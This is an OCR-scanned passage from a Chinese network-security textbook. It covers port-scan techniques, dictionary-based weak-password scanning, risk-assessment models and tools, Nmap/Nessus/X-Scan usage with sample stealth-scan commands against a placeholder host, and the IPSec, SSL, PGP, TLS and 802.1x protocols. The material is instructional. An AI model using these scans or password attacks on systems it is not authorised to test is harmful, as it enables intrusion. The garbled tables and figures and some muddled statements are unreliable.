的 以 及 被 过 滤 / 不 被 过 滤 的 端口 ， 因 为 TCP 窗口 大 小 的 报告 方式 不 规则 。 

TCPRPC 扫描 。 用 于 检测 和 定位 远程 过 程 调 用 (RemoteProcedureCall) 端口 以 及 
相关 的 程序 及 版 本 号 。 

@ UDP 扫描。 此 方法 往 目 标 端口 发 送 一 个 UDP 分组。 如果 目标 系统 返回 一 个 “ICMP 
端口 不 可 达 (ICMPportunreachable)” 来 响应 , 那么 此 端口 是 关闭 的 。 着 没有 返回 该 响应 ， 
则 认为 此 端口 是 打开 的 。UDP 是 无 连接 不 可 靠 的 ， 其 准确 性 将 受 外 界 的 干扰 。 

Ident 扫描 。 一 般 来 讲 ，Ident 服务 是 某 个 网 络 连接 的 服务 器 方 用 于 验证 客户 方 身 
份 的 。 因 此 , 监听 TCP113 端口 的 Ident 服务 应 该 是 安装 在 客户 端的 ， 并 由 该 网 络 连接 的 
服务 器 方向 客户 方 的 113 端口 反方 向 建立 连接 然后 进行 通信 。 但 用 在 端口 扫描 时 刚好 相 
反 ， 扫 描 主 机 作为 客户 方 与 目标 主机 建立 某 个 连接 〈 比 如 HITP80)， 在 作为 Ident 服务 
的 客户 方 与 目标 主机 建立 另 一 个 连接 , 并 通过 后 一 个 连接 获得 前 一 个 连接 的 对 象 身份 ( 比 
如 HITPSever 的 相关 信息 )。 

Ident 用 于 确定 某 个 TCP 连接 的 发 起 用 户 身份 , 方法 是 与 身份 验证 方 主机 的 TCP113 
端口 建立 连接 并 通信 ， 许 多 版 本 的 Ident 服务 确实 会 响应 并 返回 与 某 端 口上 服务 进程 相 
关联 的 用 户 属 性 。 

FTPBounce 扫描 。 操 作者 在 本 地 打开 与 一 个 FTPServer 的 控制 连接 (到 其 TCP21 端 
口 )， 然 后 用 PORT 命令 向 FTPServer 提供 一 个 欲 扫描 的 目标 机 器 端口 号 ， 并 发 送 LIST 
命令 。 这 时 ，FTPServer 会 向 目标 主机 指定 端口 发 送 连接 请 求 ， 如 果 目 标 主 机 相应 端口 
正在 监听 ， 则 会 返回 成 功 信息 ， 和 否则 ， 会 返回 类 似 这 样 的 连接 失败 信息 。 

源 端口 扫描 。 主 要 是 通过 扫描 DNS、SMTP、POP 这 些 默 认 端口 ， 来 判断 其 打开 情 
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况 。 可 用 的 工具 有 SuperScan、Nmap、X-Scan 等 。 
3.4.4.4 ”密码 类 扫描 

密码 类 探测 扫描 技术 〈 即 口令 攻击 ) 是 黑客 进行 网 络 攻击 时 最 常用 、 最 基本 的 一 种 
形式 。 黑 客 攻击 目标 时 常常 把 破译 普通 用 户 的 口令 作为 攻击 的 开始 。 在 网 络 安全 防御 中 ， 
密码 类 扫描 技术 的 目的 是 检测 系统 和 网 络 存在 的 弱 口 令 ， 然 后 建立 起 针对 该 类 扫描 的 防 
御 机 制 。 前 者 是 发 现 缺 省 账号 和 弱 密码 ， 如 Administor, guest, root, sa 等 。 后 者 是 指 
在 扫描 时 ， 系 统 的 安全 设施 是 否 能 检测 到 ， 以 及 在 报警 和 日 志 等 机 制 中 能 否 发 现 这 种 扫 
描 。 其 最 终 目 标 是 发 现 密码 类 的 脆弱 性 ， 并 提供 安全 建议 和 安全 补救 措施 。 

密码 类 探测 扫描 技术 首先 需要 建立 口令 字典 文件 。 然 后 采用 适当 的 方法 去 探测 。 

字典 文件 就 是 根据 用 户 的 各 种 信息 建立 一 个 用 户 可 能 使 用 的 口令 的 列表 文件 。 有 的 
用 户 喜 欢 用 比较 好 记忆 的 信息 作为 自己 常用 的 口令 。 例 如 ， 用 户 的 名 字 、 生 日 、 电 话 号 
码 、 身 份 证 号 码 、 所 居住 街道 的 名 字 、 用 户 的 偏好 、 亲 属 的 信息 、 某 些 英语 单词 等 等 。 
另外 ， 简 单 的 口令 ,特别 是 软件 安装 时 的 缺 省 口令 ， 也 是 扫描 必须 检测 的 ， 如 空 口令 、 
与 用 户 名 相同 的 口令 、1234567， 以 及 用 户 名 和 一 些 简单 的 数字 组 合 。 

常见 的 口令 攻击 技术 参见 本 章 3.3 节 的 网 络 安 全 威胁 。 
3.4.4.5 ”风险 评估 

信息 安全 风险 是 由 于 资产 的 重要 性 ， 人 为 或 自然 的 威胁 利用 信息 系统 及 其 管理 体系 
的 脆弱 性 ， 导 致 安全 事件 一 旦 发 生 所 造成 的 影响 。 信 息 安全 风险 评估 是 指 依 据 有 关 信 息 
安全 技术 与 管理 标准 ， 对 信息 系统 及 由 其 处 理 、 传 输 和 存储 的 信息 的 机 密 性 、 完 整 性 和 
可 用 性 等 安全 属性 进行 评价 的 过 程 。 它 要 评估 资产 面临 的 威胁 以 及 威胁 利用 脆弱 性 导致 
安全 事件 的 可 能 性 ， 并 结合 安全 事件 所 涉及 资产 的 重要 程度 判断 安全 事件 一 旦 发 生 对 组 
织造 成 的 影响 ， 即 信息 安全 的 风险 。 

在 信息 系统 的 风险 评估 中 ， 安 全 模型 的 研究 、 标 准 的 选择 、 要 素 的 提取 、 评 估 方 法 
的 研究 以 及 评估 实施 的 过 程 一 直 都 是 研究 的 重点 。 

我 国 也 提出 了 自己 的 动态 安全 模型 一 -WPDRRC 模型 。 该 模型 有 6 个 环节 和 3 大 
要 素 。6 个 环节 是 W、P、D、R、R、C， 它 们 具有 动态 反馈 关系 。 其 中 , P、D、R、R 
与 PDRR 模型 中 出 现 的 保护 、 检 测 、 反 应 、 恢 复 等 4 个 环节 相同 ; W 即 预警 (waming)， 
就 是 根据 已 掌握 的 系统 脆弱 性 以 及 当前 的 计算 机 犯罪 趋势 ， 去 预测 未 来 可 能 受到 的 攻击 
与 危害 ，C (counterattack) 则 是 反击 采用 一 切 可 能 的 高 新 技术 手段 ， 侦 察 、 提 取 计 
算 机 犯罪 分 子 的 作案 线索 与 犯罪 证 据 ， 形 成 强 有 力 的 取证 能 力 和 依法 打击 手段 。 因 此 近 


型 中 具有 层次 关系 的 三 大 要 素 分 别 是 人 员 、 政 策 和 技术 。 其 中 “人 ”是 内 层 ， 是 基 座 ; 
“政策 ”包括 法 律 、 法 规 、 制 度 和 管理 ， 是 中 间 层 ;“ 技 术 ” 是 外 层 ， 它 的 操作 必须 受到 
人 和 政策 这 两 个 层面 的 制约 。 三 大 要 素 之 间 的 关系 如 图 3-66 所 示 。 
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图 3-66 WPDRRC 模型 的 三 大 要 素 关 系 图 


图 3-67 中 方 框 部 分 的 内 容 为 风险 评估 的 基本 要 素 , 椭圆 部 分 的 内 容 是 与 这 些 要 素 相 
关 的 属性 。 风 险 评估 围绕 其 基本 要 素 展 开 ， 在 对 这 些 要 素 的 评估 过 程 中 需要 充分 考虑 业 
务 战 略 、 资 产 价 值 、 安 全 需求 、 安 全 事件 以 及 残余 风险 等 与 这 些 基本 要 素 相 关 的 各 类 属性 。 


业务 战略 


图 3-67 风险 要 素 关 系 图 
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风险 分 析 中 要 涉及 资产 、 威 胁 、 脆 弱 性 等 基本 要 素 。 每 个 要 素 有 各 自 的 属性 。 资 产 
的 属性 是 资产 价值 ;威胁 的 属性 是 威胁 出 现 的 频率 ， 脆 弱 性 的 属性 是 资产 弱点 的 严重 程 
度 。 最 终 ， 计 算出 一 个 量化 的 风险 值 。 

风险 评估 过 程 就 是 在 评估 标准 的 指导 下 ， 综 合 利用 相关 评估 技术 、 评 估 方 法 、 评 估 
工具 ， 针 对 信息 系统 展开 全 方位 的 评估 工作 的 完整 历程 。 对 信息 系统 进行 风险 评估 ， 首 
先 应 确保 风险 分 析 的 内 容 与 范围 应 该 履 盖 信息 系统 的 整个 体系 。 风 险 评估 过 程 应 包括 系 
统 基本 情况 分 析 、 信 息 系统 基本 安全 状况 调查 、 信 息 系统 安全 组 织 、 政 策 情况 分 析 以 及 
信息 系统 弱点 漏洞 分 析 等 环节 。 

风险 评估 具体 评估 过 程 如 图 3-68 所 示 。 


风险 评估 准备 
资产 识别 威胁 识别 脆弱 性 识别 
已 有 安全 措施 的 确认 | 
| 风险 分 析 : 
i| 保持 已 有 的 安全 措施 
下 WN i 
~~~ en miezi 


图 3-68 风险 评估 实施 流程 图 
由 于 外 在 威胁 和 各 种 攻击 不 断 变 化 ， 信 息 系统 的 需求 也 在 变化 ， 绝 对 安全 的 措施 是 
不 存在 的 。 攻 击 者 不 断 有 新 的 方法 绕 过 或 扰乱 系统 中 的 安全 措施 ， 系 统 的 变化 会 带 来 新 


的 脆弱 点 ， 实 施 的 安全 措施 会 随 着 时 间 而 过 时 等 等 。 所 有 这 些 表明 ， 信 息 系统 的 风险 评 
估 过 程 是 一 个 动态 循环 的 过 程 ， 应 周期 性 的 对 信息 系统 安全 进行 重 评估 。 
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评估 工具 如 下 : 

(1) 基于 国家 或 政府 颁布 的 信息 安全 管理 标准 或 指南 建立 风险 评估 工具 

有 美国 开发 的 基于 NIST (NationalInstituteofStandardsandTechnology) 的 FIPS65 的 
自动 风险 评估 工具 ， 还 有 基于 GAO (GovemmentAccountingOffice〉 的 信息 安全 管理 的 
实施 指南 的 自动 风险 评估 工具 。 还 有 根据 英国 BS7799 的 系列 指导 文件 PD3000 中 所 提 
供 风险 评估 方法 ， 建 立 的 CRAMM, RA 等 风险 分 析 工 具 。 

(2) 基于 专家 系统 的 风险 评估 工具 

这 种 方法 经 常 利 用 专家 系统 建立 规则 和 外 部 知识 库 ， 通 过 调查 问卷 的 方式 收集 组 织 
内 部 信息 安全 的 状态 。 如 COBRA (Consultative, ObjectiveandBi-functionalRiskAnalysis ) 
是 一 个 基于 专家 系统 的 风险 评估 工具 ， 它 采用 问卷 调查 的 形式 ， 主 要 有 三 个 部 分 组 成 : 
问卷 建立 器 、 风 险 测量 器 和 结果 产生 器 。 除 此 以 外 ， 还 有 @RISK 、BDSS 
(TheBayesianDecisionSupportSystem) 等 工具 。 

(3) 基于 定性 或 定量 分 析 的 风险 评估 工具 

风险 评估 根据 对 各 要 素 的 指标 量化 以 及 计算 方法 不 同 分 为 定性 和 定量 的 风险 分 析 
工具 。 随 着 人 们 对 信息 安全 风险 了 解 的 不 断 深入 ， 获 得 了 更 多 的 经 验 数 据 ， 因 此 人 们 越 
来 越 希望 用 定量 的 风险 分 析 方 法 反映 事故 方式 的 可 能 性 。 定 量 的 信息 安全 风险 管理 标准 
包括 美国 联邦 标准 FIPS31 和 FIPS191， 提 供 定量 风险 分 析 技 术 的 手册 包括 GAO 和 新 版 
的 NISTRMG 。 目 前 产生 的 一 系列 风险 评估 工具 都 在 定量 和 定性 方面 各 有 侧重 。 如 
CONTROL-IT, DefinitiveScenario, JANBER 都 是 定性 的 风险 评估 工具 。 而 @RISK、 
TheBuddySystem、RiskCALC、CORA (Cost-of-RiskAnalysis) 是 半 定 量 〈 定 性 与 定量 方 
法 相 结合 ) 的 风险 评估 工具 。 

此 外 , 根据 风险 评估 工具 体系 结构 不 同 ， 风 险 评估 工具 还 包括 基于 客户 机 /服务 器 模 
式 以 及 单机 版 风险 评估 工具 。 如 COBRA 就 是 基于 C/S 模式 ， 而 目前 大 多 数 的 风险 评估 
工具 识 基于 单机 版 的 。 另 外 基于 安全 因素 调查 方式 的 不 同 ， 风 险 评估 工具 还 包括 文件 式 
或 过 程式 ， 如 RA 就 是 过 程式 风险 评估 工具 。 

根据 以 上 对 综合 风险 评估 与 管理 工具 的 分 析 ， 对 目前 比较 流行 的 工具 进行 了 对 比 ， 
如 表 3-11 所 示 。 


表 3-11 综合 风险 评估 与 管理 工具 对 照 表 


工具 
COBRA RA CRAMM @RISK BDSS 
ThelntegratedRi 


skManagementG 
toup/American 


单机 版 


5358 
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采 集 | 调查 文件 调查 问卷 


依靠 评估 人 | 依靠 评估 人 
员 的 知识 与 | 员 的 知识 与 
经 验 经 验 


不 需要 有 风险 
评估 的 专业 知 


识 


人 | 不 需要 有 风险 评估 
员 的 | 的 专业 知识 


不 需要 有 风险 评 
估 的 专业 知识 


要 求 
Re SRS ARAS 
结果 | a 控制 措施 〈 基 | 控制 措施 ( 基 
果 | 结果 报告 ， 风 险 等 | 控 le : 安全 防护 措施 
ty 基于 控制 措施 ee | tee 列表 


供 的 控制 措 | 供 的 控制 措 
施 ) 施 ) 


3.4.4.6 ”主流 扫描 工具 配置 与 应 用 

常用 的 网 络 扫 描 器 都 是 可 以 从 Intemet 上 免费 获得 的 。 下 面 将 对 目前 使 用 较 多 的 三 
款 免费 扫描 软件 Nmap, Nessus, X-Scan 进行 介绍 。 

1. Nmap 

由 Fyodor 编写 的 Nmap (www.nmap.org) 是 一 个 开放 源码 的 网 络 扫描 工具 。Nmap 
允许 系统 管理 员 查 看 一 个 的 网 络 系统 有 哪些 主机 以 及 其 上 运行 何 种 服务 。 它 支持 多 种 协 
议 的 扫描 ， 如 UDP、TCPconnect0)、TCPSYN、ftpproxy、Reverse-ident、ICMP、FIN、 
ACKsweep、XmasTree、SYNsweep 和 NULL 扫描 等 。Nmap 还 提供 一 些 实用 功能 ， 如 通 
过 TCP/IP 来 鉴别 操作 系统 类 型 、 秘 密 扫 描 、 动 态 延迟 和 重 发 、 平 行 扫描 、 通 过 并 行 的 
Ping 侦 测 下 属 的 主机 、 欺 骗 扫 描 、 端 口 过 滤 探 测 、 直 接 的 RPC 扫描 、 分 布 扫描 、 灵 活 目 


标 选择 以 及 端口 的 描述 。 
Nmap 是 一 个 命令 界面 的 扫描 器 。 其 使 用 格式 为 : Nmap[ 扫 描 类 型 ][ 扫 描 选项 ][ 扫 描 
目标 ]。 


扫描 类 型 如 表 3-12 所 示 。 
表 3-12 扫描 类 型 参数 及 意义 


+ 
pi 
‘ak 


x 


-sT TCPconnect()44 fii 


-SS TCPSYN 扫描 
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参数 =z X 
-sF-sX-sN StealthFIN, XmasTree 或 Null 扫描 模式 
-sP Ping 扫描 
-sU UDP 扫描 
-sR RPC 扫描 


-b (ftprelayhost) FTP 跳跃 攻击 


关于 Nmap 的 选项 用 法 可 以 使 用 Nmap-h 来 打开 Nmap 选项 参数 。 

为 了 让 用 户 进一步 了 解 扫描 行为 ， 下 面 举 出 一 些 运 用 Nmap 的 扫描 范例 : 

例 1: Nmap-fwww.target.com 

说 明 : 对 wwwtargetcom 以 细小 的 IP 碎片 包 实现 SYN, FIN, XMAS 2 NULL 扫描 

例 2: Nmap-sS-Owww.target.com 

说 明 : 这 是 对 www.target.com 进 行 一 次 SYN 的 半 开 扫描 ， 还 试图 确定 在 其 上 运行 的 
是 什么 类 型 的 操作 系统 。 

2. Nessus 

Nessus 是 一 种 典型 的 漏洞 扫描 器 ， 它 是 由 一 个 法 国 黑客 RenaudDerasion 编写 的 , 被 
设计 为 客户 /服务 器 模式 ,其 特点 在 于 跨 平台 性 。 现 在 Nessus 已 经 有 了 Linux, BSD, Solaris 

下 的 版 本 ， 并 且 用 JAVA 写 了 新 的 客户 端 软件 。 

Nessus 是 图 形 化 的 界面 ， 使 得 它 使 用 起 来 相当 简便 ， 它 还 对 扫描 出 的 漏洞 给 出 详细 
的 利用 方法 和 补救 方法 。 

Nessus 被 设计 为 客户 机 一 服务 器 模式 ， 在 用 Nessus 进行 扫描 之 前 ， 先 要 安装 一 个 
Nessus 服务 器 。nessusd 是 Nessus 的 服务 器 程序 ， 编 译 以 后 可 以 用 nessued-Pusername， 
passwd 命令 来 创建 一 个 名 为 username 的 账号 , 它 的 口令 是 passwd。 接 下 来 需要 对 nessusd 
进行 配置 ， 配 置 文件 在 /user/local/etc/nessusd.conf 中 。 一 切 完 成 后 就 可 以 用 nessusd-D 命 
令 来 启动 nessus 服务 器 。 

3. X-Scan 

X-Scan 是 一 种 专门 对 大 范围 网 段 中 的 主机 进行 扫描 的 扫描 工具 。X-Scan 是 由 安全 
组 织 Xfocus 制作 的 免费 软件 。 它 采用 多 线程 方式 对 指定 IP 地 址 段 〈 或 单机 进行 安全 
漏洞 扫描 ， 支 持 插件 功能 ， 提 供 了 图 形 界 面 和 命令 行 两 种 操作 方式 。 扫 描 内 容 包 括 : 远 
程 操作 系统 类 型 及 版 本 、 标 准 端口 状态 及 端口 banner 信息 、CGI 漏洞 、RPC 漏洞 、 
SQL-SERVER 默认 账户 、 弱 口令 ，NT 主机 共享 信息 、 用 户 信息 、 组 信息 以 及 NT 主机 
弱 口 令 用 户 等 。 扫 描 结果 保存 在 /log/ 目 录 中 ，index_*.htm 为 扫描 结果 索引 文件 。 对 于 一 
些 已 知 漏洞 ， 该 工具 给 出 了 相应 的 漏洞 描述 、 利 用 程序 及 解决 方案 ， 其 他 的 漏洞 资料 正 
在 进一步 整理 完善 中 ， 也 可 以 通过 网 站 的 “安全 文献 ”和 “漏洞 引擎 ”栏目 查阅 相关 


pu 国 


ais) 
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说 明 。 

扫描 器 在 不 断 发 展 变化 着 ， 每 当 发 现 新 的 漏洞 ， 检 查 该 漏洞 的 功能 就 会 被 加 入 已 有 
的 扫描 器 中 。 

除了 免费 的 扫描 软件 以 外 ， 目 前 市 场 上 也 有 许多 商业 漏洞 扫描 产品 ， 如 绿 盟 科技 、 
启明 星辰 、 安 氏 等 公司 的 漏洞 扫描 器 。 下 面 就 简单 介绍 绿 盟 科技 的 极光 远程 安全 评估 系 
统 (AuroraRemoteSecurityAssessmentSystem )， 人 简称 AuroraRSAS. 

绿 盟 科 技 把 漏洞 管理 的 循环 过 程 划分 为 漏洞 预警 、 漏 洞 检测 、 风 险 管理 、 漏 洞 修复 、 
漏洞 审计 五 个 阶段 ， 在 国内 首创 了 OpenVM 工作 流程 平台 。 基 于 这 个 开放 平台 ， 极 光 将 
漏洞 管理 理念 贯穿 于 整个 产品 实现 过 程 ， 实 现 了 OpenVM 的 绝 大 部 分 过 程 ; 同时， 极光 
产品 通过 多 种 二 次 开发 接口 与 其 他 安全 产品 协作 来 完全 实现 OpenVM 的 整个 工作 流程 。 

极光 是 基于 WEB 的 管理 方式 ， 用 户 使 用 浏览 器 通过 SSL 加 密 通 道 和 系统 WEB 界 
面 模块 进行 交互 。 

极光 采用 先进 的 漏洞 识别 技术 NSIP (NSFOCUSIntelligentProfile) 和 强劲 的 底层 扫 
描 引擎 NSSE (NSFOCUSScanningEngine)。 其 漏洞 扫描 的 基本 原理 是 通过 与 目标 主机 
TCP/IP 端口 建立 连接 并 请 求 某 些 服务 (如 TELNET. FTP 等 )， 记 录 目 标 主 机 的 应 答 ， 
搜集 目标 主机 相关 信息 (如 匿名 用 户 是 否 可 以 登录 等 )， 从 而 发 现 目标 主机 某 些 内 在 的 安 
全 弱点 。 


3.4.5 ”安全 协议 


该 小 节 介绍 常见 安全 协议 的 概念 、 原 理 和 应 用 ， 如 IPSec, SSL, PGP, TLS, 
IEEE802.1x、WEP、WPA、RADIUS、Kerberos、X.509、S/MIME、SSH 等 。 
3.4.5.1 IPSec 

IPSec 是 为 网 络 层 提供 加 密 和 认证 的 协议 规范 , 有 许多 文档 规范 , 如 RFCs2401,2402， 
2406, 2408. 

© RFC2401: 安全 结构 概述 。 

。 RFC2402: 了 扩展 的 包 认证 描述 (IPv4 和 IPv6)。 

。 RFC2406: IP 扩展 的 包 加 密 描 述 (IPv4 和 IPv6)。 

© RFC2408: 特定 加 密 机 制 。 

整个 文档 分 为 七 部 分 ， 如 图 3-69 所 示 。 

。 体系 结构 : 包括 一 般 概 念 、 安 全 需求 、 定 义 和 IPSec 的 机 制 。 

。 载荷 安全 性 封装 CESP): 包括 包 格式 和 使 用 ESP 加 密 /认证 包 的 一 些 相关 约定 。 

。 认证 头 (AH): 包括 包 格 式 和 使 用 AH 认证 包 的 一 些 相关 约定 。 

。 加 密 算法 : 一 系列 描述 各 种 ESP 中 使 用 的 加 密 算 法 。 

。 认证 算法 : 一 系列 描述 各 种 AH 和 可 选 ESP 的 认证 算法 。 


辣 
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。 密 钥 管理 ;描述 密 钥 管理 模式 文档 。 
。 解释 域 : 包括 与 其 他 文档 相关 的 一 些 值 ， 如 被 认可 的 加 密 、 认 证 算法 标识 和 密 钥 


生存 周期 参数 。 
| | | 


ESP 协议 AH 协议 


图 3-69 IPSec 文档 概述 


IPSec 协议 的 具体 介绍 参见 3.4.3VPN 一 节 。 
3.4.5.2 SSL 

SSL (SecureSocketsLayer) 源 于 Netscape， 协 议 第 3 版 在 通过 公开 评论 和 工业 界 使 
用 后 成 为 互联 网 草案 , 接着 在 达到 共识 之 后 由 IETF 的 TLS 工作 组 将 其 开发 为 一 般 标准 。 

SSL 协议 以 对 称 密码 技术 和 公开 密码 技术 相 结合 ， 提 供 了 如 下 三 种 基本 安全 服务 : 

© 秘密 性 : SSL 协议 能 够 在 客户 端 和 服务 器 之 间 建 立 起 一 个 安全 通道 ， 所 有 消息 
都 经 过 加 密 处 理 以 后 进行 传输 ， 网 络 中 的 非法 黑客 无 法 窃取 。 

© 完整 性 : SSL 利用 密码 算法 和 散 列 (HASH) 函数 ， 通 过 对 传输 信息 特征 值 的 提 
取 来 保证 信息 的 完整 性 ， 确 保 要 传输 的 信息 全 部 到 达 目 的 地 ， 可 以 避免 服务 器 和 客户 端 
之 间 的 信息 受到 破坏 。 

© 认证 性 : 利用 证 书 技术 和 可 信 的 第 三 方 认 证 ， 可 以 让 客户 端 和 服务 器 相互 识别 
对 方 的 身份 。 

SSL 协议 位 于 应 用 层 和 传输 层 之 间 ， 独 立 于 应 用 层 协议 ， 即 建立 在 SSL 之 上 的 应 用 
层 协议 可 以 透明 地 传输 数据 。SSL 设计 使 用 TCP 来 提供 可 靠 的 端 到 端 安全 服务 。SSL 不 
是 简单 的 单个 协议 ， 而 是 两 层 协 议 ， 如 图 3-70 所 示 。 
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图 3-70 OSSL 协议 栈 


SSL 记录 协议 (SSLRecordProtocol) 为 高 层 协议 提供 基本 的 安全 服务 。 特 别 是 ， 为 
Web 客户 端 /服务 器 交互 提供 传送 服务 的 HTTP 协议 可 以 在 上 层 访问 SSL. 在 SSL 中 ， 
实际 的 数据 传输 是 使 用 SSL 记录 协议 实现 的 。SSL 记录 协议 是 通过 将 数据 流 分 割 为 一 系 
列 的 片段 加 以 传输 的 ， 其 中 对 每 个 片段 进行 保护 和 传输 ， 在 接收 方 ， 对 每 条 记录 单独 进 
行 解密 和 验证 。 

SSL 协议 上 定义 了 三 个 高 层 协议 ;握手 协议 、 改 变 密码 说 明 协议 和 警报 协议 。 这 些 
SSL 上 层 协议 用 于 对 SSL 交换 进行 管理 。 

握手 协议 既 可 以 用 于 建立 一 个 新 的 会 话 ， 也 可 以 用 于 恢复 一 个 先前 存在 的 会 话 ， 但 
每 次 握手 都 会 建立 一 个 全 新 的 连接 。 

客户 端 和 服务 器 开始 通信 时 ， 先 协商 协议 版 本 ， 选 择 密码 算法 及 可 选 的 相互 认证 ， 
使 用 公 钥 加 密 产生 共享 密 钥 。 客 户 端 通过 从 服务 器 获取 证 书 ， 然 后 利用 证 书 完成 密 钥 交 
换 ， 其 过 程 如 下 : 

© 向 服务 器 发 送 ClientHello 消息 ， 服 务 器 以 ServerHello 消息 应 答 。 这 一 对 消息 主 
要 用 来 协商 以 下 信息 : 协议 版 本 、session-ID、 加 密 算法 等 。 双 方 还 会 交换 
ClientHello.random 和 ServerHello.random 这 两 个 新 生成 的 随机 数 。 

© 然后 服务 器 发 送 自 己 的 证 书 (Certificate 消息 )， 同 时 发 送 自己 的 公 钥 
(SeverkeyExchange 消息 )。 如 果 它 需要 验证 客户 的 身份 , 将 发 送 CertificateRequest 消息 。 

© 服务 器 发 送 ServerHelloDone 消息 ， 表 示 握 手 的 第 一 阶段 已 完成 ， 服 务 器 将 等 待 
客户 的 应 答 。 

@ 如 果 接 收 到 CertificateRequest 消息 ， 客 户 端 将 发 送 Certifi-cate 消息 (或 者 
NoCertificate 消息 )。 客 户 创建 一 个 叫做 pre_mas-ter_secret 的 随机 数 ， 用 服务 器 的 公 钥 加 
密 ， 发 送 给 服务 器 〈Clien-tExchange 消息 )。 如 果 客 户 以 发 送 Certificate 消息 ， 将 用 自己 
的 私 钥 作 一 数字 签名 ， 发 送 给 服务 器 〈CertificateVerify 消息 )， 以 此 证 明 自 己 是 证 书 的 真 
正 拥有 者 。 

© 客户 端 发 送 ChangeCipherSpec。 和 Finished 消息 应 答 ， 表 示 握 手 过 程 结束 。 

在 握手 协议 的 任意 步 又， 如 果 协 商 结果 不 符合 自己 的 要 求 ， 通 信 的 任 一 方 均 可 终止 
握手 进程 。 握 手 完成 后 ， 客 户 端 和 服务 器 可 以 开始 交换 数据 。 

改变 密码 说 明 协 议 的 存在 是 为 了 使 密码 策略 能 得 到 及 时 的 通知 。 该 协议 只 有 一 个 消 
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息 〈 是 一 个 字 节 的 数值 )， 传 输 过 程 中 使 用 当前 的 加 密约 定 来 加 密 和 压缩 ， 而 不 是 改变 后 
的 加 密约 定 。 

报警 协议 传送 该 报警 消息 的 严重 程度 和 该 警报 的 描述 。 警 报 消息 的 致命 程度 会 导致 
连接 立即 终止 。 在 这 种 情况 下 ， 同 一 会 话 的 其 他 连接 可 能 还 将 继续 ， 但 必须 使 会 话 的 标 
识 符 失效 ， 以 防止 失败 的 会 话 继续 建立 新 的 连接 。 
3.4.5.3 PGP 

PGP (PrettyGoodPrivacy) 是 美国 PhilZimmermann 研究 出 来 的 一 个 基于 RSA AH 
加 密 体 系 的 邮件 加 密 软 件 .PGP 可 以 在 电子 邮件 和 文件 储存 应 用 中 提供 保密 和 认证 服务 ， 
防止 非 授权 者 阅读 ， 还 能 对 邮件 和 文件 加 上 数字 签名 ， 从 而 使 收 件 人 确信 发 送 者 是 谁 。 
它 让 用 户 可 以 安全 地 和 从 未 见面 的 人 通信 ， 事 先 并 不 需要 任何 保密 的 渠道 来 传递 密 匙 。 
PGP 既是 一 个 特定 的 安全 E-mail 应 用 ， 又 是 一 个 安全 的 E-mail 标准 。 尽 管 标准 委员 会 
并 没有 规定 它 是 安全 E-mail 的 标准 ， 但 是 PGP 在 全 球 的 广泛 应 用 已 经 使 它 成 为 一 个 事 
实 上 的 标准 。 

PGP 的 基本 原理 是 : 先 用 对 称 密 钥 系统 加 密 传 送 的 信息 ， 再 将 该 对 称 加 密 密 钥 以 接 
收 方 公开 密 钥 系统 的 公 钥 加 密 ， 组 成 电子 信封 ， 并 将 此 密 钥 交 给 公正 的 第 三 者 保管 ， 然 
后 将 此 电子 信封 传送 给 接收 方 。 接 收 方 必须 先 以 自己 的 私 钥 将 电子 信封 拆 封 ， 以 获得 对 
称 密 钥 解密 密 钥 ， 再 以 该 对 称 密 钥 解密 密 钥 解 出 真正 的 信息 ， 羔 顾 方便 与 效率 。 

具体 过 程 如 下 : 

@ 发 送 者 创建 报 文 ; 

© 发 送 者 用 MD5 生成 报 文 的 128bit 邮件 文摘 ; 

© 发 送 者 用 自己 的 私有 密 铀 ， 采 用 RSA 算法 对 邮件 文摘 进行 加 密 ， 串 接 在 报 文 的 
前 面 ; 

© 接收 者 使 用 发 送 者 的 公开 密 钥 ， 采 用 RSA 解密 和 恢复 邮件 文摘 ; 

© 接收 者 为 报 文生 成 新 的 邮件 文摘 ， 并 与 被 解密 的 邮件 文摘 相 比 较 。 如 果 两 者 匹 
配 ， 则 报 文 作为 已 鉴别 的 报 文 而 接收 。 

PGP 的 应 用 呈 爆 炸 性 增长 ， 并 迅速 普及 ， 原 因 可 大 致 归纳 如 下 : 

O 提供 世界 范围 内 免费 的 各 种 版 本 ， 可 运行 于 各 种 平台 ， 包 括 Windows, UNIX, 
Macintosh 等 。 另 外 ， 其 商用 版 能 使 用 户 得 到 销售 商 的 技术 支持 。 

@ 使 用 的 算法 是 经 过 充分 的 公众 检验 的 ， 且 被 认为 是 非常 安全 的 算法 。 特 别 是 ， 
软件 包 包含 RSA, DSS, Diffie-Hellman 等 公 钥 加 密 算法 ， 以 及 CAST-128、IDEA 和 对 
称 密 钥 加 密 算法 3DES，Hash 编码 算法 SHA-1。 

@ 应 用 范围 广泛 ， 既 可 用 于 公司 、 团 体 中 加 密 文 件 时 所 选择 的 标准 模式 ， 也 可 以 
在 互联 网 或 其 他 网 络 上 个 人 间 的 消息 通信 加 密 。 

@ 不 是 由 任何 政府 或 标准 制定 机 构 控制 的 ， 因 为 对 上 述 机 构 控制 的 协议 人 们 有 本 
能 的 不 信任 ， 使 得 PGP 更 有 吸引 力 。 
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© PGP 成 为 标准 文档 (RFC3156)。 
3.4.5.4 TLS 

安全 传输 层 协议 TLS (TransportLayerSecurityProtocol) 是 IETF 标准 的 初衷。 他 们 
的 目标 是 编写 SSL 的 互联 网 标准 。 当 前 TLS 的 草案 与 SSLv3 非常 相似 。TLS[RFC2246] 
是 SSL 标准 化 后 的 产物 ，TLS1.0 与 SSL3.0 的 差别 非常 微小 。 主 要 区 别 集中 在 版 本 号 、 
消息 认证 代码 MAC、 伪 随机 函数 PRF、 和 警报 代码 、 密 码 组 、 客 户 端 证 书 类 型 、 证 书 验 
证 和 完成 消息 、 密 码 计算 、 填 充 等 几 个 方面 。 
3.4.5.5 IEEE802.1x 

IEEE802.1x 是 IEEE (美国 电气 电子 工程 师 学 会 ) 802 委员 会 制定 的 LAN 标准 中 的 
一 个 ， 是 一 种 应 用 于 LAN 交换 机 和 无 线 LAN 接 入 点 的 用 户 认证 技术 。 

IEEE802.1x 起 源 于 IEEE802.11 协议 。 这 项 协议 的 主要 目的 是 为 了 解决 无 线 局 域 网 
用 户 的 接 入 认证 问题 。 例 如 : 如 何 通 过 端口 认证 来 确定 其 他 公司 的 计算 机 是 否 允许 接 入 
本 公司 无 线 网 络 。 

IEEE802.1x 在 利用 LAN 交换 机 和 无 线 LAN 接 入 点 之 前 对 用 户 进行 认证 。 支 持 
802.1x 的 LAN 交换 机 不 像 普 通 LAN 交换 机 那样 将 缆 线 连接 到 端口 上 即 可 使 用 ， 而 是 只 
有 在 对 连接 的 个 人 电脑 进行 认证 、 确 认 是 合法 用 户 以 后 才能 使 用 LAN。 通 过 认证 ，LAN 
